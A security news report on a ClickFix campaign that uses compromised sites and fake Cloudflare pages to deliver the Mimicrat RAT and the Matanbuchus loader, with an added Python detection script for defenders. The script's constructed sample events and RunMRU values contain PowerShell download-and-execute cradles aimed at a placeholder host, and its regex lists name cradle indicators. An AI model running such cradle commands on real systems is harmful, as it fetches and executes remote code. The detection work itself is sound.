Researchers at Elastic Security Labs have uncovered an active ClickFix campaign that leverages compromised legitimate websites to deploy a sophisticated, custom-built remote access trojan (RAT) dubbed ‘Mimicrat.’
Unlike more common ClickFix operations that lead to infostealer infections, the observed campaign deploys a five-stage infection chain installing a native C implant designed for persistence and lateral movement.
According to Elastic, the attackers rely on hijacked trusted websites rather than attacker-controlled infrastructure. The primary entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was compromised to host malicious JavaScript. The injected code dynamically loads an external script that mimics the jQuery library from another compromised site, blending with legitimate web resources.
The remotely loaded script (jq.php) presents victims with a fake Cloudflare verification page that copies a malicious PowerShell command directly to the victim’s clipboard and instructs them to paste it into a Run dialog (Win+R) or PowerShell prompt to “fix” a supposed issue. Because the victim executes the command by hand rather than downloading a file, this clipboard-based method bypasses browser download protections entirely.
The campaign appears to be opportunistic. It supports 17 languages and dynamically localizes lure content based on browser settings. Observed victims include a US-based university and multiple Chinese-speaking users discussing infections in public forums.
Once executed, the clipboard-delivered command initiates a five-stage attack chain. An obfuscated PowerShell downloader retrieves a second-stage script from command-and-control (C&C) infrastructure. The script disables key Windows telemetry and security protections by patching Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI), then deploys a Lua-based loader. The loader decrypts and runs shellcode entirely in memory, ultimately delivering Mimicrat.
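As an added defensive example (not code from the Elastic or Huntress reports), the following Python triage logic looks for the shape described in the two paragraphs above: a script host launched from the Run dialog (explorer.exe as parent) whose command line carries a PowerShell download cradle, plus the same check over Win+R history recorded in the RunMRU registry key. Field names, the sample events and the RunMRU values are constructed for illustration.

```python
"""Triage helpers for the ClickFix paste-into-Run pattern. Added example, not
from the Elastic/Huntress reports; field names and sample data are constructed."""
import re

# Cradle / obfuscation indicators of the kind a ClickFix lure puts on the clipboard.
CRADLE_PATTERNS = {
    "download": r"\b(iwr|invoke-webrequest|downloadstring|net\.webclient|curl)\b",
    "in-memory exec": r"\b(iex|invoke-expression)\b",
    "encoded command": r"(-e(nc|ncodedcommand)?\b|frombase64string)",
    "hidden window": r"-w(indowstyle)?\s+hidden",
    "bypass policy": r"-e(xecution)?p(olicy)?\s+bypass",
}
HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")


def cradle_indicators(command_line: str) -> list[str]:
    """Names of the cradle patterns present in a command line (case-insensitive)."""
    return [name for name, pat in CRADLE_PATTERNS.items()
            if re.search(pat, command_line, re.IGNORECASE)]


def score_process_event(event: dict) -> list[str]:
    """Flag explorer.exe (the Win+R host) spawning a script host with cradle
    indicators; a lone cradle hit is noisy, the parent/child pair is the tell."""
    from_run_dialog = (event["parent_image"].lower().endswith("explorer.exe")
                       and event["image"].lower().endswith(HOSTS))
    hits = cradle_indicators(event["command_line"])
    return ["run-dialog launch"] + hits if from_run_dialog and hits else []


def runmru_suspicious(runmru: dict) -> list[str]:
    """Check HKCU\\...\\Explorer\\RunMRU values (Win+R history, each ending in a
    '\\1' marker) for pasted cradles; these persist after the process exits."""
    return [v.removesuffix("\\1") for k, v in runmru.items()
            if k != "MRUList" and cradle_indicators(v)]


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/jq.php)"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"parent_image": r"C:\Program Files\Deploy\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell -File C:\scripts\inventory.ps1"},
]
SAMPLE_RUNMRU = {"a": "powershell -w hidden -c iex(iwr https://example.invalid/x)\\1",
                 "b": "cmd\\1", "MRUList": "ba"}  # constructed
```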
The final payload is a C-based implant. Its configuration (stored in the .data section) contains cryptographic keys, connection parameters, and two complete HTTP communication profiles. All headers and URIs are hex-encoded and decoded at runtime to evade detection.
Mimicrat supports 22 commands, including file and process management, interactive shell access, token impersonation, shellcode injection, and SOCKS5 proxy tunneling.
In a separate report, cybersecurity firm Huntress shared details of a similar ClickFix campaign that delivered Matanbuchus 3.0, a premium malware-as-a-service loader. First advertised in 2021 on Russian-speaking cybercrime forums, it was originally priced at $2,500 per month. Version 3.0, however, was completely rewritten and now sells for up to $10,000 per month for the HTTPS version and $15,000 per month for a stealthier DNS-based variant.
Matanbuchus has been used to deploy additional malware such as Cobalt Strike, QakBot, DanaBot, Rhadamanthys stealer, and NetSupport RAT. Huntress assesses with medium confidence that the attacker’s ultimate goal was ransomware deployment or data exfiltration.